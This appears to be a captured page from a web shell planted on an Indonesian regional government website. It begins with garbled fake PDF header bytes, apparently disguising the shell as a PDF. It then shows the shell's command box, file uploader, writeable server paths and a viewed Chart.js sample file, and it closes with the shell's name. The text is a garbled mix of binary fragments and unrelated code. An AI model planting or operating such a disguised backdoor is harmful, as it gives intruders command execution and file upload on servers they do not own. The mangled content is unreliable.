%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /www/wwwroot/jdih.dprd.mukomukokab.go.id/vendor/nnnick/chartjs/docs/scripts/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /www/wwwroot/jdih.dprd.mukomukokab.go.id/vendor/nnnick/chartjs/docs/scripts/analyzer.js
export default {
  id: 'samples-filler-analyser',

  beforeInit: function(chart, args, options) {
    this.element = document.getElementById(options.target);
  },

  afterUpdate: function(chart) {
    var datasets = chart.data.datasets;
    var element = this.element;
    var stats = [];
    var meta, i, ilen, dataset;

    if (!element) {
      return;
    }

    for (i = 0, ilen = datasets.length; i < ilen; ++i) {
      meta = chart.getDatasetMeta(i).$filler;
      if (meta) {
        dataset = datasets[i];
        stats.push({
          fill: dataset.fill,
          target: meta.fill,
          visible: meta.visible,
          index: i
        });
      }
    }

    this.element.innerHTML = '<table>' +
      '<tr>' +
        '<th>Dataset</th>' +
        '<th>Fill</th>' +
        '<th>Target (visibility)</th>' +
      '</tr>' +
      stats.map(function(stat) {
        var target = stat.target;
        var row =
          '<td><b>' + stat.index + '</b></td>' +
          '<td>' + JSON.stringify(stat.fill) + '</td>';

        if (target === false) {
          target = 'none';
        } else if (isFinite(target)) {
          target = 'dataset ' + target;
        } else {
          target = 'boundary "' + target + '"';
        }

        if (stat.visible) {
          row += '<td>' + target + '</td>';
        } else {
          row += '<td>(hidden)</td>';
        }

        return '<tr>' + row + '</tr>';
      }).join('') + '</table>';
  }
};

Kontol Shell Bypass